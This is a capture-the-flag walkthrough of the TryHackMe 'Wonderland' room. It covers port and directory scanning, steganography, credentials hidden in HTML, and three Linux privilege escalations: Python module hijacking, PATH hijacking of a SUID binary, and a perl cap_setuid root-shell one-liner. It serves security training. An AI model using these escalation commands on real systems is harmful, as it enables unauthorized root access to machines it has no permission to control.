Wonderland
These notes are from a challenge I did @tryhackme called wonderland.
First Checks
Let's scan for open ports first: nmap -sC -sV 10.10.28.31
Nmap output
``` txt Nmap scan report for 10.10.28.31 Host is up (0.075s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds ```
Let's search for paths on the webpage on port 80: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.28.31:80
Gobuster output
txt Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.28.31:80 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/10/21 16:46:38 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /r (Status: 301) [Size: 0] [--> r/] /poem (Status: 301) [Size: 0] [--> poem/]
Steganography
Looking at http://10.10.28.31/img/ we see the following files:
- alice_door.jpg
- alice_door.png
- white_rabbit_1.jpg
Let's download them all:
wget http://10.10.28.31/img/alice_door.jpg
wget http://10.10.28.31/img/alice_door.png
wget http://10.10.28.31/img/white_rabbit_1.jpg
and run steghide...
Unfortunately alice_door.jpg
and alice_door.png
don't show any result (at least not without a passphrase...) but white_rabbit_1.jpg
seems promissing:
steghide extract -sf white_rabbit_1.jpg -p ''
the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t
The hint means to follow this path: http://10.10.28.31/r/a/b/b/i/t/
Viewing the HTML code we see:
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
Login as alice
Let's try to login using those credentials: ssh alice@10.10.28.31
ssh login
``` txt Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
System information as of Thu Oct 21 19:14:20 UTC 2021
System load: 0.0 Processes: 85 Usage of /: 18.9% of 19.56GB Users logged in: 0 Memory usage: 31% IP address for eth0: 10.10.28.31 Swap usage: 0%
0 packages can be updated. 0 updates are security updates.
Last login: Mon May 25 16:37:21 2020 from 192.168.170.1 ```
It is strange to see root.txt in the folder of alice.find ./ -type f -iname "user.txt"
doesn't reveal anything. The hint "Everything is upside down here." means if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by runningcat /root/user.txt
. lol...
Escalate privileges to rabbit
We see walrus_and_the_carpenter.py
imports and calls random
to get 10 random lines from the alice in wonderland lyrics stored in the file:
import random
[...]
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)a
Running sudo -l
shows we can run walrus_and_the_carpenter.py
as rabbit:
ssh login
``` txt Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py ```
To escalate privileges we can misuse the fact that we can run walrus_and_the_carpenter.py
by creating our own random.py
with the following content to overwrite the random function imported and called in walrus_and_the_carpenter.py
import os
def choice(argument):
os.system("/bin/bash")
Running walrus_and_the_carpenter.py
with our random.py
will now give us prompt as rabbit:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
Tea Party
As rabbit we see the following files in home:
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
Running teaParty we get the following:
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him
Let's copy teaParty
to the kali machine and view it in detail with strings teaParty
:
strings teaParty
Serving teaParty to my kali machine
txt python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.9.193.173 - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -
Downloading teaParty file
``` txt wget 10.10.28.31:8000/teaParty --2021-10-21 15:59:24-- http://10.10.28.31:8000/teaParty Connecting to 10.10.28.31:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 16816 (16K) [application/octet-stream] Saving to: ‘teaParty’
teaParty 100%[========================================>] 16.42K --.-KB/s in 0.02s
2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816] ```
Runstrings teaParty
txt /lib64/ld-linux-x86-64.so.2 2U~4 libc.so.6 setuid puts getchar system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ Welcome to the tea party! The Mad Hatter will be here soon. /bin/echo -n 'Probably by ' && date --date='next hour' -R Ask very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped) ;*3$" GCC: (Debian 8.3.0-6) 8.3.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7325 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry teaParty.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata system@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start getchar@@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main setgid@@GLIBC_2.2.5 __TMC_END__ _ITM_registerTMCloneTable setuid@@GLIBC_2.2.5 __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment
We see the program calls date
in this line: /bin/echo -n 'Probably by ' && date --date='next hour' -R
. Just like with "random" from above, let's create our own date
file e.g.:
#!/bin/sh
bash
Now, let's change the file to be executable by everyone: chmod +x date
and add it to the path variables: PATH=/home/rabbit:$PATH
If we now execute ./teaParty
we get a shell as hatter:
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
We can see the hatter password in /home/hatter/password.txt
Login as hatter
Since we have the user name and password, let' us login with ssh: ssh hatter@10.10.28.31
sudo -l
, find / -perm -u=s -type f 2>/dev/null
and find / -xdev -user hatter 2>/dev/null
don't reveal any interesting output but find / -xdev -group hatter 2>/dev/null
shows group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn’t set on the perl executable.
There is another thing we can check: With getcap -r / 2>/dev/null
we can check for "capabilities" and we see perl in the list:
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
Let's run a perl script misusing the capabilities from GTOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
We are now root and can read the root.txt in the home folder of alice:
cat /home/alice/root.txt